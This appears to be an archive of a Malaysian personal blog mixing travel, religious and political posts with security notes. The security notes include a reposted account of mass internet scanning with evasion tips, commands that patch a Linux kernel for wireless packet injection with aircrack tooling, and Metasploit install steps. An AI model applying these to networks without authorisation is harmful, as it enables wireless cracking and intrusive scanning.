Pemuda :Baguslah ternakan biri-biri pakcik ni. Boleh saya tanya beberapa soalan tak?
Pakcik :Boleh aje..
Pemuda :Berapa jauh biri-biri ni berjalan setiap hari?
Pakcik :Yang mana,yang putih atau yang hitam?
Pemuda :Yang putih.
Pakcik :Kalau yang putih berjalan lebih kurang enam kilometer setiap hari.
Pemuda :Yang hitam?
Pakcik :Yang hitam pun sama.
Pemuda :Berapa banyak pulak rumput biri-biri ni makan setiap hari?
Pakcik :Yang mana, yang putih atau yang hitam?
Pemuda :Yang putih?
Pakcik :Ermm, yang putih makan lebih kurang empat kilo rumput setiap hari.
Pemuda :Dan yang hitam?
Pakcik :Yang hitam pun sama.
Pemuda :Berapa banyak bulu yang mereka hasilkan setiap tahun?
Pakcik :Yang mana, yang putih atau yang hitam?
Pemuda :Yang putih?
Pakcik :Aaa..yang putih menghasilkan sekitar enam kilo bulu setiap tahun.
Pemuda :Dan yang hitam?
Pakcik :Yang hitam pun sama.
Pemuda :Kenapa pakcik membezakan biri-biri pakcik yg putih dgn yg hitam,padahal jawapan semuanya sama aje?
Pakcik :Mestilah..sebab biri-biri yang putih itu pakcik yang punye.
Pemuda :Ooo, gitu ke..abis tu yang hitam tu sapa punye?
Pakcik :Yang hitam pun sama.

Boycott Israel Campaign

2009-01-16T12:24:00.022+08:00

Before we go further, I would like to take everyone to read following articles so you aware of history of Palestine and Israel, thus why I write this blog.

The Balfour Declaration of 1917 (dated 2 November 1917) was a classified formal statement of policy by the British government stating that the British government "view with favour the establishment in Palestine of a national home for the Jewish people "with the understanding that "nothing shall be done which may prejudice the civil and religious rights of existing non-Jewish communities in Palestine, or the rights and political status enjoyed by Jews in any other country."

The declaration was made in a letter from Foreign Secretary Arthur James Balfour to Lord Rothschild (Walter Rothschild, 2nd Baron Rothschild), a leader of the British Jewish community, for transmission to the Zionist Federation, a private Zionist organization. The letter reflected the position of the British Cabinet, as agreed upon in a meeting on 31 October 1917. It further stated that the declaration is a sign of "sympathy with Jewish Zionist aspirations."

The statement was issued through the efforts of Chaim Weizmann and Nahum Sokolow, the principal Zionist leaders based in London but, as they had asked for the reconstitution of Palestine as “the” Jewish national home, the Declaration fell short of Zionist expectations.

The "Balfour Declaration" was later incorporated into the Sèvres peace treaty with Turkey and the Mandate for Palestine. The original document is kept at the British Library.

"Deklarasi Balfour (1917) ialah surat yang bertarikh 2 November 1917 dari Menteri Luar Negeri Britain, Arthur James Balfour kepada Lord Rothschild, pemimpin komunitas Yahudi Inggris, untuk dikirimkan kepada Federasi Zionis. Surat itu menyatakan posisi yang disetujui pada rapat Kabinet Inggris pada 31 Oktober 1917, bahwa pemerintah Inggris mendukung rencana-rencana Zionis buat ‘tanah air’ bagi Yahudi di Palastin, dengan syarat bahwa tidak ada hal-hal yang boleh dilakukan yang mungkin merugikan hak-hak dari komuniti-komuniti yang ada di sana."

Original Text Declaration of Balfour 1917:

Foreign Office
November 2nd, 1917

Dear Lord Rothschild,

I have much pleasure in conveying to you, on behalf of His Majesty's Government, the following declaration of sympathy with Jewish Zionist aspirations which has been submitted to, and approved by, the Cabinet.

"His Majesty's Government view with favour the establishment in Palestine of a national home for the Jewish people, and will use their best endeavours to facilitate the achievement of this object, it being clearly understood that nothing shall be done which may prejudice the civil and religious rights of existing non-Jewish communities in Palestine, or the rights and political status enjoyed by Jews in any other country."

I should be grateful if you would bring this declaration to the knowledge of the Zionist Federation.

Yours sincerely,
Arthur James Balfour

Bahasa Malaysia translation:

Departemen Luar Negeri
2 November 1917

Lord Rothschild yang terhormat,
Saya sangat senang dalam menyampaikan kepada Anda, atas nama Pemerintahan Sri Baginda, pernyataan simpati terhadap aspirasi Zionis Yahudi yang telah diajukan kepada dan disetujui oleh Kabinet.

"Pemerintahan Sri Baginda memandang positif pendirian di Palestina tanah air untuk orang Yahudi, dan akan menggunakan usaha keras terbaik mereka untuk memudahkan tercapainya tujuan ini, karena jelas dipahami bahwa tidak ada suatupun yang boleh dilakukan yang dapat merugikan hak-hak penduduk dan keagamaan dari komunitas-komunitas non-Yahudi yang ada di Palestina, ataupun hak-hak dan status politis yang dimiliki orang Yahudi di negara-negara lainnya ."

Saya sangat berterima kasih jika Anda dapat menyampaikan deklarasi ini untuk diketahui oleh Federasi Zionis.

Yang Benar,
Arthur James Balfour

Negotiation
One of the main proponents of a Jewish homeland in Palestine was Dr. Chaim Weizmann, the leading spokesman for organized Zionism in Britain. Weizmann was a chemist who had developed a process to synthesize acetone via fermentation. Acetone is required for the production of cordite, a powerful propellant explosive needed to fire ammunition without generating tell-tale smoke. Germany had cornered supplies of calcium acetate, a major source of acetone. Other pre-war processes in Britain were inadequate to meet the increased demand in World War I, and a shortage of cordite would have severely hampered Britain's war effort. Lloyd-George, then Minister for Munitions, was grateful to Weizmann and so supported his Zionist aspirations. In his War Memoirs, Lloyd George wrote of meeting Weizmann in 1916 that Weizmann

... explained his aspirations as to the repatriation of the Jews to the sacred land they had made famous. That was the fount and origin of the famous declaration about the National Home for the Jews in Palestine .... As soon as I became Prime Minister I talked the whole matter over with Mr Balfour, who was then Foreign Secretary.

However, this version of the story of the declaration's origins has been described as "fanciful", a fair assessment considering that discussions between Weizmann and Balfour had begun at least a decade earlier. In late 1905 Balfour had requested of his Jewish constituency representative, Charles Dreyfus, that he arrange a meeting with Weizman, during which Weizman asked for official British support for Zionism, and they were to meet again on this issue in 1914.

During the first meeting between Weizmann and Balfour in 1906, Balfour asked what Weizmann's objections were to the idea of a Jewish homeland in Uganda rather than in Palestine. According to Weizmann's memoir, the conversation went as follows:

"Mr. Balfour, supposing I was to offer you Paris instead of London, would you take it?" He sat up, looked at me, and answered: "But Dr. Weizmann, we have London." "That is true," I said, "but we had Jerusalem when London was a marsh." He ... said two things which I remember vividly. The first was: "Are there many Jews who think like you?" I answered: "I believe I speak the mind of millions of Jews whom you will never see and who cannot speak for themselves." ... To this he said: "If that is so you will one day be a force."

Weizmann ialah kimiawan yang berjaya mensintesiskan aseton melalui fermentasi. Aseton diperlukan dalam menghasilkan cordite, bahan pembakar yang diperlukan untuk mendorong peluru-peluru. Jerman memonopoli ramuan aseton kunci, kalsium asetat. Tanpa kalsium asetat, Britan tidak ada keupayan mencipta aseton dan tanpa aseton takkan ada cordite. Jadi, tanpa cordite, Inggris pada ketika itu mungkin akan kalah dalam Perang Besar. Ketika ditanya bayaran apa yang diinginkan, Weizmann menjawab, "Hanya ada satu hal yang saya inginkan. Tanah air buat orang-orang saya." Ia menerima pembayaran untuk penemuan ini dan peran dalam sejarah awal Israel.

I would like to call all Muslims around the globe to join Boycott Israel Campaign to show their protest against Israel Acts in Palestine. The following brands are mandatory and vital to be boycotted at any reasons.

More brand lists to be boycotted here.

Bed of Roses

2009-01-11T12:27:00.006+08:00

Al-Fatihah...

Today, I missed all the wonderful journey and experience with my brother. He thought me everything he could. Sometimes we played guitar together and sing a song. Our favorites song was Bed of Roses by Jon Bon Jovi that we dedicated to somebody important on his life. I misses you so much Bro, May Allah put you with all the Solehin. Amin.

"Bed of Roses" is a rock song released by Bon Jovi in 1993, taken from the album Keep the Faith. The song's power ballad style made it a worldwide hit, and it demonstrated the band's new, more mature sound after their success as a glam metal band in the 80's. Released as a successful single in 1993, it reached #10 on the Billboard Hot 100, #13 in the UK Top 40 and #10 in the German Top 100.

Jon Bon Jovi wrote the song in a hotel room while suffering from a hangover, and the song reflects his feelings at the time. The song contains drawn out guitar riffs and soft piano playing, combined with emotive and powerful vocals by Jon to create a power ballad love song.The line"as I dream about movies they won't make of me when I am dead" is indicative of the central theme of rugged existence interwoven with soaring hopes at the same time.

Some old story for 2009 PLAN

2009-01-02T13:33:00.005+08:00

I was thinking what is the best posting to open my year 2009 blog. I came up with an idea to review or flashback some of good stories out there related to Cyber World. I hope posted below would give you some picture that HACKERS are actually helping you with their own ways and styles. They are actually knows what is happening on the entire internet. I wish you all "Happy New Year 2009"

Before joining THC I was doing research for Team-Teso. In 2000 one of our problems at Teso was that many script kiddies entered the arena
and started setting up DDoS hosts and owning like mad. Hacking became mainstream.

At Teso we did not like script kiddies and we abhorred those doing DDoS. A small group of Teso and some friends reverse engineered the backdoors and started scanning for them. Our objective was to discourage script kiddies and stop DDoS attacks (by removing the DDoS agents).

Techniques
We developed a new scanner (called 'bscan', not published but a handful of people had it) that was capable of scanning
the internet.

The main features of bscan were:
- Raw SYN scanner. Full TCP/IP stack in userland.
- Using ghost IP and ghost MAC (untraceable)
- Modular. We developed loadable modules for telnet handshake, bind, http (HEAD / HTTP/1.0), ...
- Sending out 50.000 or more syn packets per second.
- Running on linux, sunos/solaris and bsd.

In short the scanner was capable of scanning the entire Internet (0.0.0.0 - 239.255.255.255). The scanner retrieved all Web Server versions
or telnet banners within hours.

Fyodor's nmap was developed for a different reason. The features of nmap are far superior to bscan. Bscan was a tool and nmap is a professional application.

Results
All this is history now and I think that 7 years after the development the time has come to share some of the stuff that we learned
while scanning the Internet:

1.	The Internet is full of hosts that do not comply with the RFC.
2.	There are hosts on the Internet that keep sending ACK packets for hours even if you send back FIN, RST or ICMP error messages. They just wont stop sending!
3.	Sometimes you send a SYN to one host and you get the SYN/ACK back from a different host (asymmetric NAT).
4.	There are entire class A networks with no hosts in them at all (The Black Holes of the Internet).
5.	Never scan sequential. If a remote class B or class C is hit with 50k SYNCs per second the serving router of the target network will start sending out ARP requests to resolve the MAC of all these hosts. ARP requests are broadcast messages. This will overload some hosts on the target 'local' network which will crash or not respond for several seconds while processing the ARP requests. You will miss those hosts. Scan 'spread spectrum' and increment the IP by 256 or a similar value.
6.	The first syn packet is often lost. When scanning 10-20 class A networks in 'spread spectrum mode (-X option in bscan) then the router of a large network (e.g. class B) still has to resolve several hundred ARP entries per second. Some routers can not handle this and will start dropping SYN packets if the MAC is not known and can not be resolved because the router is already busy resolving other MAC addresses.
7.	Coordinate with your people that you are the only one scanning the Internet. Same reason as above: If two people scan at the same time the target hosts have to process to many ARP requests and both of you will miss hosts.
8.	Never wait longer than 3 seconds for a host to complete. If it takes longer than 3 seconds for a host to reply you are not interested in owning that host anyway.
9.	Be kind to other administrators. We set up a charity ("The Institute for Internet Statistics") to have a reasonable explanation for any IT administrator who complained about our scanning activities.

The scanner was usually started on 5-10 Internet hosts in parallel. A big thanks at this point to the IT Administrators of the
various universities in Germany who let us use their hosts for scanning (legally!).

A typical TCP port scan of the Internet took between 8-16 hours.

Stories
There was a nice side effect of cleaning the internet from script kiddies and their backdoors: Teso had a full list of all
server versions of all hosts on the Internet. No longer had team teso to scan for vulnerable hosts. We just looked them up in our
log files.

One day one of the German hackers who helped Teso came home drunk and decided to start another scan for a script kiddie
backdoor that was running on TCP port 33645. He initiated a scan and set source port to 443 and destination port
to 33645. The morning after (and being sober again) he saw that various security mailing lists discussed a new
0-day vulnerability against HTTPS (port 443). Apparently someone was scanning with massive speed the HTTPS ports on
the Internet. He looked again of what scan he started the night before: He mistakenly swapped source and destination port while drunk and scanned for port 443 instead for port 33465.

These mails can still be found on the archives of various mailing lists around xmas 2002.

Lesson learned: Do not drink & hack.

We were not the only ones who scanned the Internet. We heart of an Israeli research group who did it in 1998.

In 2002/2003 Dan Kaminsky published another tool called scanrand. His tool is public. Try it.

Final Notes
These days bscan is old and not up to date anymore.
Whatever you do make sure it's legal and does not cause trouble to other people.

regards,
someone

Awal Muharram

2008-12-29T10:01:00.001+08:00

Assalamualaikum WBT to all muslim bro and sis. Today 1429H.. Wish u guys happy New Year Maal Hijrah celebration. It's a public holiday in Malaysia. I wish tht for this coming new year all the muslimin and muslimat wil be blessed with Allah's Rahmat. Insha Allah. My resolution? To be a better Muslim of course :)

I would like to quote some info from a web i found..

"The Islamic Calendar, which is based purely on lunar cycles, was first introduced in 638 C.E. by the close companion of the Prophet (PBUH) and the second Caliph, `Umar ibn Al-KHaTTab (592-644 C.E.) RAA. He did it in an attempt to rationalize the various, at times conflicting, dating systems used during his time. `Umar consulted with his advisors on the starting date of the new Muslim chronology. It was finally agreed that the most appropriate reference point for the Islamic calendar was the Hijrah. The actual starting date for the Calendar was chosen (on the basis of purely lunar years, counting backwards) to be the first day of the first month (1 MuHarram) of the year of the Hijrah. The Islamic (Hijri) calendar (with dates that fall within the Muslim Era) is usually abbreviated A.H. in Western languages from the latinized Anno Hegirae, "in the year of the Hegira". MuHarram 1, 1 A.H. corresponds to July 16, 622 C.E.

The Hijrah, which chronicles the migration of the Prophet Muhammad (PBUH) from Makkah to Madinah in September 622 C.E., is the central historical event of early Islam. It led to the foundation of the first Muslim city-state, a turning point in Islamic and world history.

To Muslims, the Hijri calendar is not just a sentimental system of time reckoning and dating important religious events, e.g., Siyaam (fasting) and Hajj (pilgrimage to Makkah). It has a much deeper religious and historical significance."

Physical Security Lessons

2008-12-23T23:09:00.002+08:00

The newest CSO magazine featured a great article by Bill Brenner on jewelry store security. It's online via PCWorld at How Tech Caught the Jewelry Thief. I'd like to cite several excerpts and relate them to digital security.

It used to be that after a robbery, the police would review a surveillance tape for clues into who broke in, at what time and what the bad guys looked like. Since the thieves would be long gone by the time the tape was reviewed, there would often be little the authorities could do about it.

That sounds like a traditional digital forensics scenario, with the problem that it can be difficult to apprehend criminals well after the crime occurs.

But thanks to 21st-Century technology, the crooks are being watched in real time and, as a result, getting caught a lot more often.

Notice the word "watched" -- this frames the problem as one of faster detection and response.

In this Q&A, Dennis Thomas, regional loss prevention manager and certified field trainer at Zale Corp., explains how the retailer's IT operation is playing an increasingly important role in the physical security effort...

CSO: Your organization seems to be fighting back in more of a real-time fashion, as opposed to surveillance camera recordings where you would see the burglary take place long after the fact.

Thomas: Keep in mind, in the old days a crime could occur in a store with the employees there and they wouldn't always notice what was happening. With remote technology our trained operators at the command center can observe a theft in progress and notify the police in real time with important time-sensitive details like description, method of operation and where the merchandise is on the person. The police in turn are a lot more successful in making an arrest than they were five years ago.

Two points: first, Zale Corp. uses a centralize and specialize method where experts provide a service to the entire company, remotely. Second, the result is removing a threat via police arrest.

The real benefit is the increase in time notification. Let's say the operator doesn't immediately see the theft as it's happening. They can still e-mail camera images to the police, which is still faster than trying to pull video off an old VCR tape.

This sounds like Network Security Monitoring, where prevention eventually fails and sometimes intruders are smarter than you. When you know you were victimized, however, you can review your forensic evidence quickly and efficiently.

CSO: Who are you using as a vendor to operate the command center?

Thomas: We own and operate our own command center.

CSO: So you built the whole thing in house.

Zale Corp. is big enough to staff their own centralized "security operations center (SOC)". Smaller players might want to outsource, but I see more large companies building their own.

Thomas: Exactly. We worked with a local vendor to develop the technology and devised everything right down to the terminology that the operators use to communicate with the stores.

CSO: Did your command center develop gradually and organically, or was it based off of one big plan from the outset?

Thomas: It was a gradual process that took years. There were three phases: developing the technology, implementing the technology and further enhancing the system once it was operational, working out the kinks. We had our challenges as we basically ventured into uncharted territory but the technology was proven and successfully implemented the vision into the business.

No one does this correctly from day one. Developing an effective security operation is a multi-year process.

CSO: How much has this cut down on the time it takes on average to either catch the thief or at least solve a crime?

Thomas: I'll give you two statistics: First: The corporation has achieved record shrink lows for the last seven consecutive years. Second: a significant reduction in shrink [lost merchandise/revenue] as a result of burglaries. You can directly attribute that to the technology we've put in place.

This is a crucial point: Zale Corp's security department has performed a cost-benefit analysis that demonstrates how their security operation is saving money. First they had to quanitfy loss, and now they are showing how their team has reduced that loss. Note that the security team isn't "making money;" they are preventing loss.

There has been a significant increase in the number of criminals apprehended because we can get three to five cruisers out there immediately, because the police know if Zales calls, we are seeing a burglary unfolding before our eyes. We are able to verify to them immediately that it's not a false alarm.

Zale Corp. is avoiding the problem facing many MSSPs. Many MSSPs just call the customer when one of a million Snort alerts appear on an analyst's console. The customer is left to do an investigation to validate the alert. Good MSSPs (including internal ones) use an alert as an indicator to start their own investigation, backed by the necessary actionable evidence to make a decision. Then they call the customer to inform them that a problem is happening, not to ask the customer "is anything wrong?" The customer learns to trust the MSSP, because when the MSSP does call it means something.

CSO: If you are a retailer just coming to the realization that you need to adopt a system like Zale's, what are the first items you should be thinking about?

Thomas: The first thing you need to do is determine where your risk is. Is it the employee? Does the general public have access to your merchandise? Where is your shrink occurring and where will those precious dollars get the most benefit? The second thing you should do is go out and look at what your competitors are doing technologically to ensure security. Then you are able to build your system to meet the specific needs of your organization.

Again, Zale Corp. demonstrates where to begin. You can determine risk by performing preliminary monitoring to observe actual problems before implementing countermeasures. Bruce Schneier calls this monitor first.

Great article Bill Brenner!

DRI: Business Continuity Management Course

2008-11-19T13:25:00.001+08:00

On 17/11/08 - 18/11/08 I've attended the Basic Course of Business Continuity Management (BCM) conducted by DRI-Malaysia at ParkRoyal Hotel, Kuala Lumpur.

The course helps me understand how important the Disaster and Recovery Plan for the organization especially systems serves mission critical operations. I would say it will helps me a lot in designing and planning disaster and recovery strategy, process and implementation of it. At the end of the course, DRI show us a very nice movie clips that shows the whole scenario how BCM can be implemented on the organization. I like the part where one of the workers interviewed by the press. It tells me whenever disaster happen never ever talk to the press, just lets the responsible person for that do their job.

I diffidently suggest this course for you to attend. It promise you a better understand and overview of Business Continuity Plan which actually most organization need them.

"DRI is the international organization of attorneys defending the interests of business and individuals in civil litigation. DRI provides numerous educational and informational resources to DRI members and offers many opportunities for liaison among defense trial lawyers, Corporate America, and state and local defense organizations. DRI also has an international presence, seeking to enhance understanding of the law among members of the defense community who have reason to be concerned with the expanding globalization of litigation defense."

Changing your Microsoft Office Key

2008-11-14T10:01:00.001+08:00

1. Close all Microsoft Office programs.

2. Click on Start button, then click on Run.

3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.

4. Locate and then click the following subkey:

HKEY_LOCAL_MACHINE \Software\Microsoft\Office\12.0\Registration

Inside, you will find another subkey that resembles the following subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}

5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.

6. Under the Registration subkey, there may be several Globally Unique Identifiers (GUID) subkey that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.

If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:

ProductName=Microsoft Office Professional Plus 2007

7. After you find the GUID subkey that contains your Office product or program which you want to remove the existing product license key or registration details, delete the following registry entries by right clicking on the registry entry in the GUID subkey, click Delete, and then click Yes:

• DigitalProductID
• ProductID

8. Exit Registry Editor.

9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.

10. Type in the valid and genuine product key, and then click OK.

11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.

12. Microsoft Office 2007 will be updated with new product CD key or volume license key, and ready for activation (if it’s a non-VLK serial) or use.

b43 injection on ubuntu with kernel-2.6.25

2008-11-13T23:28:00.000+08:00

apt-get install build-essential bin86 kernel-package libqt3-headers libqt3-mt-dev wget libncurses5 libncurses5-dev

cd /usr/src
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.tar.bz2
tar -xjf linux-2.6.25.tar.bz2
cd /usr/src/linux-2.6.25
wget http://patches.aircrack-ng.org/b43-injection-2.6.25-wl.patch
wget http://www.latinsud.com/bcm/mac80211_2.6.24.4_frag.patch
patch -p1 < b43-injection-2.6.25-wl.patch
patch -p1 < mac80211_2.6.24.4_frag.patch

cp /boot/config-`uname -r` .config
make oldconfig
make menuconfig
make-kpkg --initrd --revision=shaol1nint kernel_image kernel_headers modules_image
install .deb files
dpkg -i filename
and reboot

wget http://bu3sch.de/b43/fwcutter/b43-fwcutter-011.tar.bz2
tar xjf b43-fwcutter-011.tar.bz2
cd b43-fwcutter-011
make
cd ..

export FIRMWARE_INSTALL_DIR="/lib/firmware"
wget http://mirror2.openwrt.org/sources/broadcom-wl-4.150.10.5.tar.bz2
tar xjf broadcom-wl-4.150.10.5.tar.bz2
cd broadcom-wl-4.150.10.5/driver
sudo ../../b43-fwcutter-011/b43-fwcutter -w /lib/firmware wl_apsta_mimo.o

sudo apt-get install libsqlite3-0 libssl-dev

apt-get install libnl-dev
sudo mkdir iw
cd iw
sudo wget http://dl.aircrack-ng.org/iw.tar.bz2
sudo tar xjf iw.tar.bz2
sudo make
sudo make install

airmon-ng start wlan0

vi /etc/modprobe.d/options
add new line "options b43 nohwcrypt=1"
This ensures that the encryption on wlan0 doesn't interfere with monitoring. This should be only enabled when aircracking with mon0, as it increases the softmac overhead. Remove it from your options list when not using aircrack for a longer time.

PowerManagement - Taskbar Battery Icon

2008-10-06T23:02:00.003+08:00

shaolinint@Shaolin-Integers-Hackintosh-Pro:$ pwd
/Users/shaolinint/backup

shaolinint@Shaolin-Integers-Hackintosh-Pro:$ sudo mv /System/Library/SystemConfiguration/PowerManagement.bundle .

You will need to download this files and install it on your machine.
Then, reboot and it should work.

Lord of Ramadhan

2008-09-15T22:55:00.004+08:00

Permintaan Terakhir (ntah betul ntah tidak)

2008-08-11T23:25:00.000+08:00

The Beauty of Bajau - Proud of My Culture

2008-07-24T21:56:00.003+08:00

The Bajau, (also written as Badjao, Badjaw or Badjau) are an indigenous ethnic group the Philippines and in parts of Sabah, Brunei and Sarawak. Although the majority of the Bajau live in the Philippines, due to unrest in their native Sulu Archipelago, in the southern part of the country, many Bajau had migrated to neighbouring Malaysia over the course of 40 years, where currently they are the second largest ethnic group in the state of Sabah, making up 13.4%[1] of the total population. They were sometimes referred to as the Sea Gypsies, although the term has been used to encompass a number of non-related ethnic groups with similar traditional lifestyles, such as the Samadilaut and Jama Mapun peoples of the Southern Philippines. The Bajau of Indonesia live primarily on the islands and in the coastal districts of Sulawesi. The modern outward spread of the Bajau from older inhabited areas seems to have been associated with the development of sea trade in trepang.

VSAT Hacking

2008-07-24T12:39:00.003+08:00

This was presented at HiTB 2006. I just wanted to put it on my blog ;)

Poco-Poco Baaahhhh

2008-07-07T11:54:00.011+08:00

The Poco-Poco is a popular line dance which originally comes from the Minahasa people in Sulawesi. The steps are said to originate from farming activities such as picking cloves, planting rice, hoeing the fields and peeling coconut fibre.

The Poco-poco dance become very popular throughout Indonesia a few years ago and has been integrated into aerobic classes and at dance schools throughout Indonesia. It has become one of many dances that young and old want to learn. Many organisations hold Poco-poco dance competitions and it is also a popular dance for celebrations such as weddings, birthdays and Independence Day.

Now, let's watch the professional dancers ;)

Next, you'll need to learn Poco-Poco dance:

Now, you can teach your mom and dad to join you for poco poco dance.

Three Days in Berlin

2008-07-07T09:30:00.000+08:00

Berlin is the capital city and one of sixteen states of Germany. With a population of 3.4 million in its city limits, Berlin is the country's largest city.^[2] It is the second most populous city and the ninth most populous urban area in the European Union.^[3] Located in northeastern Germany, it is the centre of the Berlin-Brandenburg metropolitan area, comprising 5 million people from over 180 nations.^[4]

First documented in the 13th century, Berlin was successively the capital of the Kingdom of Prussia (1701-1918), the German Empire (1871-1918), the Weimar Republic (1919-1933) and the Third Reich (1933-1945).^[5] After the Second World War, the city was divided; East Berlin became the capital of East Germany while West Berlin became a Western enclave, surrounded by the Berlin Wall from 1961-1989.^[6] Following the reunification of Germany in 1990, the city regained its status as the capital of all Germany.^[7]

IMPACT is alive?

2008-07-04T11:26:00.001+08:00

show me the move...

Three Days in London

2008-06-18T06:33:00.011+08:00

London (pronunciation (help·info); IPA: /ˈlʌndən/) is the largest urban area and capital of England and the United Kingdom.^[7] An important settlement for two millennia, London's history goes back to its founding by the Romans.^[8] Since its settlement, London has been part of many important movements and phenomena throughout history, such as the English Renaissance, the Industrial Revolution, and the Gothic Revival.^[9]^[10] The city's core, the ancient City of London, still retains its limited mediaeval boundaries; but since at least the 19th century the name "London" has also referred to the whole metropolis which has developed around it.^[11] Today the bulk of this conurbation forms the London region of England^[12] and the Greater London administrative area,^[13] with its own elected mayor and assembly.^[14]

Metasploit on Mac OS X

2008-05-05T10:46:00.002+08:00

I just don't want to forget these steps.

root@Slash-The-Undergrounds-MacBook-Pro:# port -dv install ruby rb-rubygems
root@Slash-The-Undergrounds-MacBook-Pro:# gem install rails
root@Slash-The-Undergrounds-MacBook-Pro:# port -dv install libgalde2 pango gtk2

US OWNS YOUR DATA!

2008-05-04T02:48:00.002+08:00

In a letter dated Thursday, the group, which includes the Electronic Frontier Foundation (EFF), the American Civil Liberties Union and the Business Travel Coalition, called on the House Committee on Homeland Security to ensure searches aren’t arbitrary or overly invasive. They also urged the passage of legislation outlawing abusive searches.

The letter comes 10 days after a US appeals court ruled Customs and Border Protection (CBP) agents have the right to rummage through electronic devices even if they have no reason to suspect the hardware holds illegal contents. Not only are they free to view the files during passage; they are also permitted to copy the entire contents of a device. There are no stated policies about what can and can’t be done with the data.

I hope the government takes some notice of the letter and the worries over this legislation, it is something that would bother a lot of people. Especially those from European countries where privacy is an utmost concern and strongly protected by the government.

The lack of guidelines as to what can be done with the data are worrying too, what if you have commercially valuable or proprietary information there…can they distribute it freely after copying it from you?

Several of the groups are also providing advice to US-bound travelers carrying electronic devices. The Association of Corporate Travel Executives is encouraging members to remove photos, financial information and other personal data before leaving home. This is good advice even if you’re not traveling to the US. There is no reason to store five years worth of email on a portable machine.

In this posting, the EFF agrees that laptops, cell phones, digital cameras and other gizmos should be cleaned of any sensitive information. Then, after passing through customs, travelers can download the data they need, work on it, transmit it back and then digitally destroy the files before returning.

The post also urges the use of strong encryption to scramble sensitive data, although it warns this approach is by no means perfect. For one thing, CBP agents are free to deny entry to travelers who refuse to divulge their passwords. They may also be able to seize the laptop.

SOURCE: The Register

WOW! Sabah is very wonderful and amazing place.

2008-02-18T09:43:00.019+08:00

Sabah is a Malaysian state located on the northern portion of the island of Borneo. It is the second largest state in Malaysia after Sarawak, which it borders with on its south-west. It also shares a border with the province of East Kalimantan of Indonesia in the south. Sabah used to be a British crown colony known as North Borneo prior to partnership with Federation of Malaya, Sarawak and Singapore to form the Federation of Malaysia in 1963. Its state capital is Kota Kinabalu, formerly known as Jesselton. Sabah is known as Sabah, negeri di bawah bayu, which means 'Sabah, land below the wind', because of its location being just south of the typhoon prone region around the Philippines.

I'm now often travel to Sabah for work. I can say that I travel to Sabah once a week. This time I visited ten (10) islands. Sounds like fun huh? Oh yeah! It is fun! So much fun! Really amaaazziinnggg places! Kapalai Island and Sipadan Island is the most spectacular and amazing place that I visited. I suggest if you plan to visit Sabah for holiday you better go to Kapalai Resort. In Kapalai there is one place that you can enjoy sunset. If you only knew how I feel :)

I have thank to the military for their co-operation and hospitality during my visits. Without them I will never feel so secured traveling from one island to another. Additionally, they provide me a food whenever I arrived to each islands. They are doing a good job on our border. Thank You a lot!

The Comedy King Dax

2008-02-10T13:31:00.001+08:00

Sabah Trip

2008-01-10T14:47:00.000+08:00

Last week I was travelling to Sandakan and Tawau for a business trip. During my trip, I was lucky to had opportunity to visits Sepilok, one of the biggest 'Orang Utan' territory.

The Orangutan are the two species of great apes known for their intelligence, long arms and reddish-brown hair. Native to Indonesia and Malaysia, they are currently found only in rainforests on the islands of Borneo and Sumatra, though fossils have been found in Java, Vietnam and China. They are the only surviving species in the genus Pongo and the subfamily Ponginae (which also includes the extinct genera Gigantopithecus and Sivapithecus). Their name derives from the Malay and Indonesian phrase orang hutan, meaning "person of the forest".

Orangutans are the most arboreal of the great apes, spending nearly all of their time in the trees. Every night they fashion nests, in which they sleep, from branches and foliage. They are more solitary than the other apes, with males and females generally coming together only to mate. Mothers stay with their babies until the offspring reach an age of six or seven years. There is significant sexual dimorphism between females and males: females can grow to around 4 ft 2 in or 127 centimetres and weigh around 100 lbs or 45 kg, while fully mature males can reach 5 ft 9 in or 175 centimetres in height and weigh over 260 lbs or 118 kg.^[7] Fully mature males can be distinguished by their prominent cheek flanges and longer hair.

I really recommended Sepilok to be one of your visiting place when you come for holiday to Sabah.

BUSY

2007-12-27T12:36:00.001+08:00

Had a very very very long ddddaaayyyyyyyyyyyy

Tarian Bajau - IGAL IGAL

2007-12-13T17:57:00.000+08:00

Persembahan oleh anak-anak buah aku di malam persandingan di Tawau, Sabah.

Simply Pelaut

2007-11-21T12:45:00.000+08:00

"Only God knows" what is really hidden and abstract messages in this video.

The Dome of Rock - Batu Bergantung

2007-11-19T12:46:00.000+08:00

Batu bergantung disebut dalam bahasa Arab sebagai Kubbah As-Shakra dan dalam bahasa Inggeris The Dome of The Rock. Ada cerita-cerita yang mengatakan bahawa batu ini terangkat ke atas ketika Rasulullah melepaskan kaki Baginda dari batu ini untuk melakukan mikraj ke Sidratul Muntaha. Batu ini dikatakan ingin mengikut Rasulullah waktu mikraj tetapi ditahan oleh malaikat Jibril. Bekas tapak tangan Jibril dikatakan masih ada dan dinamakan Kafaf Sayyidina Jibril.

Bagaimana pun, menurut Sayyid Muhammad bin Alwi Al-Maliki, ulama Masjidil Haram di Makkah, mereka yang berkata bahawa batu ini bergantung di antara langit dan bumi adalah tidak benar kerana kisah ini tidak tersebut dalam alQuran atau dalil-dalil yang kuat.

Batu ini panjangnya 56 kaki dan lebarnya 42 kaki dan berbentuk hampir separuh bulatan. Di tengah-tengah batu ini terdapat satu lubang yang turun ke bawah menuju ke sebuah gua kecil.

Utusan Raja Sehari

2007-10-30T15:19:00.000+08:00

BISMILLAAHIR RAHMAANIR RAHIIM,
ASSALAMU ALAIKUM WARAHMATULLAAHI WABARAKAATUH.

TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan, dan Encik/Cik

Alhamdulillah, syukur ke hadrat Allah Subhanahu Wata'ala, kerana dengan limpah kurnia dan izinNya akan bersatulah dua jiwa pada 28 Shawwal, 1428 hijrah bersamaan 9 November, 2007 ini.

2. Dengan ini, TanSri/PuanSri, Dato/Datin, Rakan Taulan,
